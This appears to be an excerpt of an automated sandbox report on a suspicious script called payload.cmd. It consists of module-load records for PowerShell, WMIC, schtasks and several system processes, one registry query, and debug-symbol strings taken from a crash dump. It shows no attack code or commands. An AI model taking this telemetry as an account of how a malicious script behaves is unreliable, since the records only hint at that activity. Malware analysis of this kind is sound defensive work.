Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: faultrep.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbgcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textshaping.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: textinputframework.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coreuicomponents.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windowscodecs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sxs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntdsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: logoncli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pdh.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: xmllite.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\dllhost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: pdh.dll
Source: C:\Windows\System32\winlogon.exe Section loaded: amsi.dll
Source: C:\Windows\System32\lsass.exe Section loaded: pdh.dll
Source: C:\Windows\System32\lsass.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\dwm.exe Section loaded: pdh.dll
Source: C:\Windows\System32\dwm.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pdh.dll
Source: C:\Windows\System32\svchost.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: payload.cmd Static file information: File size 5214429 > 1048576
Source: Binary string: System.Configuration.Install.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.pdb@` source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.Install.ni.pdbRSDSQ source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Core.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000033.00000002.2566233511.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127214561.000001A9EB82B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.DirectoryServices.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.ni.pdbRSDS[q source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831le.js source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.ServiceProcess.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.Install.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdbP4 source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Management.Infrastructure.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000033.00000002.2569137727.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000000.2127445152.000001A9EB85B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: mscorlib.pdbL source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdbM* source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.Security.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdbirFKI source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.Powershell.PSReadline.pdbP source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.DirectoryServices.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.CSharp.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.Data.ni.pdbRSDSC source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Configuration.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.ServiceProcess.pdbpx' source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Xml.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000033.00000000.2127365559.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000033.00000002.2567666914.000001A9EB842000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: System.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: Microsoft.PowerShell.ConsoleHost.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Drawing.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdb source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Data.pdbH source: WER2F3A.tmp.dmp.12.dr
Source: Binary string: System.Management.Automation.ni.pdbRSDS source: WER2F3A.tmp.dmp.12.dr
